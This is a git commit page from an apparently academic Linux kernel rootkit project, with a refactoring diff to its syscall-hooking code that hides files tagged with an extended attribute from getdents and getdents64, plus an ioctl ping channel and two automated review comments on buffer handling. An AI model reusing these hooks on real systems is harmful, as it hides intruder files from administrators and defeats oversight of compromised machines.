linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit c095ddabeb73914893cb196bd9bc3c833528ed94
parent 1eaf28abe1435f6154153b363a4cd43de5309c6e
Author: deurzen <m.deurzen@tum.de>
Date:   Mon, 23 Nov 2020 09:08:57 +0100

refactors code

Diffstat:
Msrc/filehide.c | 8++++----
Msrc/hook.c | 5+----
Msrc/hook.h | 2+-
Msrc/ioctl.c | 4++--
4 files changed, 8 insertions(+), 11 deletions(-)

diff --git a/src/filehide.c b/src/filehide.c
@@ -2,8 +2,8 @@
 #include <linux/fs.h>
 #include <linux/fdtable.h>
-#define FILEHIDE_XATTR_NAME "user.rootkit"
-#define FILEHIDE_XATTR_VAL "rootkit"
+#define G7_XATTR_NAME "user.rootkit"
+#define G7_XATTR_VAL "rootkit"
 #include "common.h"
 #include "filehide.h"
@@ -37,9 +37,9 @@ must_hide_inode(struct dentry *dentry)
 if(dentry && dentry->d_inode)
 if(!inode_permission(dentry->d_inode, MAY_READ)) {
- ssize_t len = vfs_getxattr(dentry, FILEHIDE_XATTR_NAME, buf, SIZE);
+ ssize_t len = vfs_getxattr(dentry, G7_XATTR_NAME, buf, SIZE);
- if (len > 0 && !strncmp(FILEHIDE_XATTR_VAL, buf, len))
+ if (len > 0 && !strncmp(G7_XATTR_VAL, buf, strlen(G7_XATTR_VAL)))
 return dentry->d_inode->i_ino;
 }
diff --git a/src/hook.c b/src/hook.c
@@ -13,6 +13,7 @@ extern rootkit_t rootkit;
 void **sys_calls;
+
 atomic_t getdents_count;
 atomic_t getdents64_count;
@@ -82,7 +83,6 @@ g7_getdents(const struct pt_regs *pt_regs)
 unsigned long offset;
 dirent_t_ptr kdirent, cur_kdirent, prev_kdirent;
 struct dentry *kdirent_dentry;
- struct inode *kdirent_inode;
 cur_kdirent = prev_kdirent = NULL;
 int fd = (int)pt_regs->di;
@@ -98,7 +98,6 @@ g7_getdents(const struct pt_regs *pt_regs)
 atomic_inc(&getdents_count);
 kdirent_dentry = current->files->fdt->fd[fd]->f_path.dentry;
- kdirent_inode = kdirent_dentry->d_inode;
 inode_list_t hidden_inodes = { 0, NULL };
 inode_list_t_ptr hi_head, hi_tail;
@@ -148,7 +147,6 @@ g7_getdents64(const struct pt_regs *pt_regs)
 unsigned long offset;
 dirent64_t_ptr kdirent, cur_kdirent, prev_kdirent;
 struct dentry *kdirent_dentry;
- struct inode *kdirent_inode;
 cur_kdirent = prev_kdirent = NULL;
 int fd = (int)pt_regs->di;
@@ -164,7 +162,6 @@ g7_getdents64(const struct pt_regs *pt_regs)
 atomic_inc(&getdents64_count);
 kdirent_dentry = current->files->fdt->fd[fd]->f_path.dentry;
- kdirent_inode = kdirent_dentry->d_inode;
 inode_list_t hidden_inodes = { 0, NULL };
 inode_list_t_ptr hi_head, hi_tail;
diff --git a/src/hook.h b/src/hook.h
@@ -23,7 +23,7 @@ void remove_hooks(void);
 void disable_protection(void);
 void enable_protection(void);
-
+// hooks
 asmlinkage long g7_getdents(const struct pt_regs *);
 asmlinkage long g7_getdents64(const struct pt_regs *);
diff --git a/src/ioctl.c b/src/ioctl.c
@@ -37,10 +37,10 @@ detect_channel(unsigned cmd)
 int handle_ping(unsigned long arg) {
- (void)copy_from_user(buf, (const char *)arg, BUFLEN);
+ copy_from_user(buf, (const char *)arg, BUFLEN);
 if (!strcmp("PING", buf)) {
 buf[1] = 'O';
- (void)copy_to_user((char *)arg, buf, BUFLEN);
+ copy_to_user((char *)arg, buf, BUFLEN);
 }
 return 0;
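Review bot: The new `strncmp` bound in must_hide_inode, `strlen(G7_XATTR_VAL)`, is a behaviour change rather than part of the rename: the old code compared the `len` bytes that `vfs_getxattr` actually returned, while the new code always compares the constant's length, so a stored value shorter than the constant makes `strncmp` read bytes of `buf` beyond what this call wrote (whether those bytes are initialised depends on `buf`'s definition, which is outside the hunk). Since the commit message says "refactors code", this deserves at least a comment stating the intended rule, e.g. `/* bound is the constant's length, not the xattr length returned in len */`, or keeping `len` as the bound so the comparison stays within the returned data. The enclosing function and the declaration of `buf` and `SIZE` start outside the hunk.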
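Review bot: Removing the `(void)` casts from `copy_from_user` and `copy_to_user` in handle_ping leaves their return values unchecked; both are `__must_check` in the kernel, so the hunk replaces an explicit suppression with a `-Wunused-result` warning while the underlying problem survives the commit, namely that a failed copy is ignored and `buf` is then passed to `strcmp` holding whatever it contained before. The usual kernel form is `if (copy_from_user(buf, (const char *)arg, BUFLEN)) return -EFAULT;`, with the same check on the copy back. Whether `buf` is guaranteed NUL-terminated for `strcmp` cannot be judged here, since its definition and `BUFLEN` are outside the hunk.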